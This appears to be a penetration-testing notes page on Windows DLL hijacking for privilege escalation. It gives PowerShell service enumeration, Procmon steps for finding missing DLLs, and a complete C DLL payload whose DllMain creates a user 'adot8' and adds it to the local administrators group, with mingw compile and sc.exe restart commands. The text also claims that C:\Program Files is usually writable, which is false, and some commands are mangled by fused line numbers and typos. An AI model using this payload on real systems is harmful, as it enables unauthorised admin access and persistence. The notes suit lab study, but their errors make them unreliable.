Dll Hijacking
Dynamic Link Libraries are like executables but they aren't directly executable. They are shared libraries that contain functions, classes, resources, variables etc and they often…
DLL Hijacking
Overview
Dynamic Link Libraries are like executables but they aren't directly executable. They are shared libraries that contain functions, classes, resources, variables etc and they often run with executables.
When a Windows applications or services start up they look for their DLLs to run with.However if the DLL they're looking for doesn't exist or is missing AND the path to it is writable then we can get malicious with it.
Escalation via DLL Hijacking
Simulation Steps:
- List running services and find one that sticks out
01Get-CimInstance -ClassName win32_service | Select02Name,State,PathName | Where-Object {$_.State -like 'Running'}- Spin up Procmon
- Filter menu > Filter > Process Name > is > <service binary>
- Add filter of "Result is NAME NOT FOUND then Include"
- Add filter of "Path ends with .dll then Include"
- Restart the service
- This will show all of the NAME NOT FOUND for DLLs
- We can exploit this if the location of the non existing DLL is writable
- C:\Program Files is usually writable
- Start service and see if it's looking for a DLL to a writable path
- After ones been found can put a fake DLL there make it call to a malicious executable and pop a shell
In this case we can compile a malicious dll payload from a c program and make the dll add the user we're using the the local admin group or pop a shell
01#include <stdlib.h>02#include <windows.h>03BOOL APIENTRY DllMain(04HANDLE hModule,// Handle to DLL module05DWORD ul_reason_for_call,// Reason for calling function06LPVOID lpReserved ) // Reserved07{08switch ( ul_reason_for_call )09{10case DLL_PROCESS_ATTACH: // A process is loading the DLL.11int i;12i = system ("net user adot8 password123! /add");13i = system ("net localgroup administrators adot8 /add");14break;15case DLL_THREAD_ATTACH: // A process is creating a new thread.16break;17case DLL_THREAD_DETACH: // A thread exits normally.18break;19case DLL_PROCESS_DETACH: // A process unloads the DLL.20break;21}22return TRUE;23}$ x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dllSave to the writable location and restart service
01sc.exe stasc stop dllsvc02sc.exe start dllsvcOR
<figure><img src="/files/S43HHwkTffkpKaEFrhDI" alt=""><figcaption></figcaption></figure>01$env:Path